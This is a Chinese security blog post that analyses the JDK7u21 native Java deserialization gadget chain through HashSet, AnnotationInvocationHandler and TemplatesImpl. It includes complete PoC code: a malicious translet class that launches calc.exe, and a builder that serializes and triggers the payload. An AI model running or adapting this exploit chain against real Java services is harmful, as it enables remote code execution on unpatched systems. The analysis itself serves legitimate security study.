JDK7u21原生反序列化链分析

已于 2022-03-31 21:12:10 修改
阅读量834 收藏
点赞数
分类专栏: 代码审计 java安全 文章标签: 安全漏洞 java 网络安全
于 2021-12-05 12:04:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121727428
版权

JDK7u21原生反序列化链分析

前面分析的都是第三方的反序列化链,那么有没有JDK原生的反序列化链呢?答案是有的,JDK7u21 和 JDK8u20就是两条原生的反序列化链!

漏洞分析

equalsImpl动态调用方法

在AnnotationInvocationHandler.equalsImpl方法中存在一个动态方法调用
image-20211205110614935
跟进一下getMemberMethods方法,可以知道是遍历this.type这个对象的所有方法
image-20211205110659149
equalsImpl方法的作用就是遍历this.type这个对象的所有方法并一一执行,这个有什么危害呢?

设想一下,当this.type为Templates接口(接口里有newTransformer、getOutputProperties这两个待实现的方法),equalsImpl方法的参数var1为构造的恶意TemplatesImpl对象,则此时会遍历调用TemplatesImpl.newTransformer和TemplatesImpl.getOutputProperties方法,TemplatesImpl.newTransformer方法是反序列化链中很常见的一环!

那么接下来就是找一条到equalsImpl方法的调用链

AnnotationInvocationHandler.invoke方法

AnnotationInvocationHandler.invoke方法在前面ACC链中就有用到,这个方法里面当满足如下条件时就调用了equalsImpl方法,条件需要var4为equals
image-20211205111507603
那么怎么调用到invoke方法呢?分析过ACC链的都知道可以通过动态代理调用到invoke方法

但是根据调用equalsImpl方法的条件,我们需要找到一个在readObject方法中动态调用到equals方法的类,这里用到的是HashSet类

HashSet类

HashSet.readObject方法调用HashMap.put方法对HashSet里面的元素进行处理
image-20211205112651536
跟进put方法,这个方法动态调用了equals方法
image-20211205112811273
试想一下,当key为代理对象(应该是这么叫吧),k为恶意构造的TemplatesImpl对象,则此时会调用AnnotationInvocationHandler.invoke->AnnotationInvocationHandler.equalsImpl->TemplatesImpl.newTransformer调用链从而执行系统命令!所以HashSet里面要存放两个元素,第一个为TemplatesImpl对象,第二个为代理对象

当然前面的调用链得以执行需要满足HashSet里面元素的hash相等,跟进hash方法
image-20211205113646261
对hash值计算起决定性作用的是k.hashCode方法,根据前面分析的HashSet里面的元素,代理对象的hash要和TemplatesImpl对象的hash值要相等,TemplatesImpl对象的hash值无法预测,那么只能去跟进代理对象的hash计算方法了。

当调用k.hashCode方法计算代理对象的hash时,会调用到AnnotationInvocationHandler.invoke->AnnotationInvocationHandler.hashCodeImpl调用链,跟进到hashCodeImpl方法

private int hashCodeImpl() {
    int var1 = 0;

    Entry var3;
    for(Iterator var2 = this.memberValues.entrySet().iterator(); var2.hasNext(); var1 += 127 * ((String)var3.getKey()).hashCode() ^ memberValueHashCode(var3.getValue())) {
        var3 = (Entry)var2.next();
    }

    return var1;
}

this.memberValues是实例化AnnotationInvocationHandler对象时传入的第二个参数,我们可以传入一个HashMap对象

从上面代码得知,当HashMap对象的键的hashCode()方法返回值为0时,var1变量就取决于HashMap对象的值的hash,那么此时让HashMap对象的值为TemplatesImpl对象,就可以实现hash值相等这一条件了!

"f5a5a608".hashCode()计算出来的hash值就为0,那么让HashMap的键为5a5a608字符串即可

构造payload

payload中使用到LinkedHashSet是避免使用HashSet有时无法执行系统命令的情况,具体原因没深究

Evil.java

package org.apache.shiro.test;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class Evil extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { }
    public Evil() throws IOException {
        Runtime.getRuntime().exec("calc.exe");
    }
}

PayloadDemo01.java

package org.apache.shiro.test;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.*;

public class PayloadDemo01 {
    public static void main(String[] args) throws Exception {
        HashSet hashSet = (HashSet) getObject();
        serAndUnser(hashSet);
    }
    public static Object getObject() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(org.apache.shiro.test.Evil.class.getName());
        byte[] bytes = clazz.toBytecode();
        TemplatesImpl Evilobj = new TemplatesImpl();
        HashMap hashMap = new HashMap();
        hashMap.put("f5a5a608","val");
        Class clazz02 = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor con = clazz02.getDeclaredConstructor(Class.class, Map.class);
        con.setAccessible(true);
        InvocationHandler handler = (InvocationHandler)con.newInstance(Templates.class,hashMap);
        Templates proxy = (Templates) Proxy.newProxyInstance(Class.class.getClassLoader(), new Class[]{Templates.class}, handler);
        HashSet hashSet = new LinkedHashSet();
        hashSet.add(Evilobj);
        hashSet.add(proxy);
        hashMap.put("f5a5a608",Evilobj);
        setField(Evilobj,"_bytecodes",new byte[][]{bytes});
        setField(Evilobj,"_name","ky");
        setField(Evilobj,"_tfactory",new TransformerFactoryImpl());
        return hashSet;
    }
    public static void setField(Object obj,String field,Object value) throws Exception{
        Field declaredField = obj.getClass().getDeclaredField(field);
        declaredField.setAccessible(true);
        declaredField.set(obj,value);
    }
    public static void serAndUnser(Object obj) throws Exception{
        ByteArrayOutputStream bo = new ByteArrayOutputStream();
        ObjectOutputStream oo = new ObjectOutputStream(bo);
        oo.writeObject(obj);
        oo.flush();
        oo.close();
        ByteArrayInputStream bi = new ByteArrayInputStream(bo.toByteArray());
        ObjectInputStream oi = new ObjectInputStream(bi);
        Object o = (Object) oi.readObject();
    }
}

总结

在JDK7中,只要在JDK7u21版本之前的都可以使用这条链。因为JDK7和6是同时开发的(JDK7在更新的同时JDK6也在更新),所以并不是JDK6中都存在这条链,JDK6u45版本还可以用这条链。

0x6b79
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java反序列之Jdk7u21回显
m0_64354070的博客
12-06 2202
以前在打RMI反序列化的时候都是用的CC、CB利用链实现报错回显,很好使。 之前在做一次项目的时候发现了目标存在RMI反序列化漏洞,系统为Windows,无DNS不出网。 通过延时探测出只存在Jdk7u21利用链。 RMI回显 打目标时依然尝试使用老方法回显,Jdk7u21 + 报错回显,发现一直没回显。平时自己Jdk7u21利用链用得比较少,大概了解Jdk7u21最后的利用也是通过Templatesimpl#newTransformer方法实现代码执行,只能去看代码分析下失败的原因。 Jdk7u
绕过高版本JDK限制的JNDI注入
weixin_45682070的博客
01-21 1640
前言 JNDI_RMI在JDK 6u132, JDK 7u122, JDK 8u113版本中,系统属性 com.sun.jndi.rmi.object.trustURLCodebase;com.sun.jndi.cosnaming.object.trustURLCodcbase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。 JNDI_LDAP在Oracle JDK 6u211、7u201、8u191、11.0.1、之后 com.sun.jndi.ldap.obj
Javaweb安全——反序列化漏洞-原生利用链JDK7u21
weixin_43610673的博客
07-08 543
先来看看ysoserial当中payload的调用链:从TemplatesImpl.getOutputProperties()开始是很熟悉的,而调用它用的类也在之前CC1利用链出现过:当时只用到了这个类会触发 Map#put 、 Map#get 的特点,这条利用链则是用到了其方法去调用 有个很明显的反射调用 ,而 memberMethod 由getMemberMethods()方法获得,最终是由this.type.getDeclaredMethods()得到的type属性设置的类的所有方法。 equals
java序列化_Java反序列化系列 ysoserial Jdk7u21
weixin_40003451的博客
11-17 296
0x01Jdk7U21漏洞简介谈到java反序列化,就绕不开一个经典的漏洞,在ysoserial 的payloads目录下 有一个jdk7u21,以往的反序列化Gadget都是需要借助第三方库才可以成功执行,但是jdk7u21的Gadget执行过程中所用到的所有类都存在在JDK中,JRE版本<=7u21都会存在此漏洞0x02 Jdk7u21漏洞原理深入讲解漏洞执行流程整体的恶意...
java 7u21_java培训班 | JDK反序列化Gadgets-7u21
weixin_28750663的博客
03-04 195
从fastjson1.24版本的反序列化利用方式知道有使用jdk7u21的版本利用链,ysoserial利用工具中也有7u21利用链。现在都是7u80版本了,这个漏洞真正直接利用,估计已经很难找到了。但是这个利用链的构造有很多之前没接触过的java特性,就此好好学习一下,也算是fastjson的前置知识吧。先去Oracle官网下载漏洞jdk版本7u21,漏洞影响7u25之前的版本,整条链poc貌似...
MySQL_Fake_Server:MySQL Fake Server用于帮助MySQL客户端文件读取和JDBC客户端Java反序列化
04-22
根据登录用户名返回文件读取利用报文、反序列化利用报文。 **推荐用法:**config.json中预置了一部分配置信息,可以自己修改添加指定用户名对应的读取文件和yso参数,详细看下面的说明 测试环境: jdk1.8.20+mysql-...
Java快速序列化库
09-08
此资源为九Java快速序列化库,序列化速度更快(2-10倍)、体积更小,而且兼容 JDK 原生的序列化。要求 JDK 1.7 支持。
Java快速序列化库FST.zip
07-16
序列化速度更快(2-10倍)、体积更小,而且兼容 JDK 原生的序列化。要求 JDK 1.7 支持。 Maven:  <groupId>de.ruedigermoeller  <artifactId>fst  <version>1.58 示例代码: // ! reuse this Object,...
springboot2+elasticsearch7+可视化es-head+cerebro整合搜索
06-16
使用原生的byte[]或者String使用Map方式,会自动转换成与之等价的JSON使用第三方库来生成序列化beans,如JackJSON、FastJSON等使用内置的帮助类XContentFactory.jsonBuilder()前端技术 :ElasticSearch-head插件...
JNDI-Inject-Exploit
11-04
> 本工具用于解决 Fastjson、log4j2、原生JNDI注入等场景中针对高版本JDK无法加载远程恶意类,通过LDAP服务器返回原生Java反序列化数据,受害者(客户端)在具备反序列化Gadget依赖的情况下可达到命令执行、代码执行...
jdk-7u72-windows-i586.exe
02-11
jdk7是java开发工具最基本的环境搭建必须具备的工具,基于这个才可以
JDK1.7的最新安装包jdk-7u271-linux
11-26
针对2020年7月份Oracle官网最新发布的PSU补丁,需要JDKJava 1.7.0_191)及以上的JDK才能进行补丁更新,但目前Oracle官网最新的JDK1.7版本为jdk-7u80,无法使用。
jdk-7u21-windows-x64.part1
05-01
有两部分 windows-x64 目前最新的JDK
jdk-7u21-windows-x64.exe
01-24
java最常用的jdk版本,在windows下双击运行可直接安装,安装成功后,配上环境变量就可以使用。
jdk-7u21-windows-i586.part1.rar
06-06
最新版jdk7.0,免费送上方便大家下载,分为2个部分,请大家都下载后在解压~~
java安全(四) JNDI
weixin_45694388的博客
03-25 8912
JNDI JNDI(Java Naming and Directory Interface)是Java提供的Java 命名和目录接口。通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDI是Java EE的重要部分,需要注意的是它并不只是包含了DataSource(JDBC 数据源),JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA 通俗理解,使用jndi作为数据源而不是直接去连接数据库,将数据库交给jndi去配置管理,jndi通过数据源名称去应用数据
Jdk7u21 反序列化漏洞Gadget原理
Exploit的小站~
05-10 9748
0x00 昨天看到n1nty发了文章分析深度 - Java 反序列化 Payload 之 JRE8u20,分析了Jre8u20这个Gadgets,读了之后顶礼膜拜,Jre 8u20我并没有研究过,不过看到文章开始提到了7u21中的这个Gadget,可能很多同学对这个原理不是很清楚,所以这里翻出一篇当初分析的原理文分享出来,原文如下: 0x01 对这个Gadget的理解需要一定的java动...
Java反序列 Jdk7u21 Payload 学习笔记
weixin_44476888的博客
04-24 1628
0x00 简介 最近在看Java 反序列化的一些东西,在学习 ysoserial 的代码时,看到 payload list 中有一个比较特殊的 Jdk7u21,该 payload 不依赖第三方库,只需 JRE 即可完成攻击,影响 JRE versions <=7u21 的版本。在学习的过程中,觉得很有意思,这里记录一下的过程,如果有什么地方写的不准确或错误,欢迎指出 文章中的代码运行环境为...
JRE8u20反序列化漏洞
xiaoWhite_meng的博客
07-10 757
JRE8u20反序列化漏洞分析美丽联合安全MLSRC2018-07-09共16208人围观WEB安全漏洞0×00 TLDR之前在第一篇文章中我们简单的讲了一下Java的序列化机制,即通过ObjectOutputStream和ObjectInputStream来实现序列化和反序列化,但是内部的机制和原理一并跳过了。JRE8u20这个漏洞是其他人在之前JDK7u21的基础上进行改进得到了,他绕过了Ja...
springboot的redis序列化和反序列化
最新发布
05-26
Spring Boot提供了多种Redis序列化方式,包括JDK序列化、JSON序列化、FastJSON序列化、Jackson序列化、...与序列化类似,Spring Boot也提供了多种反序列化方式,包括JDK反序列化、JSON反序列化、Protobuf反序列化等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值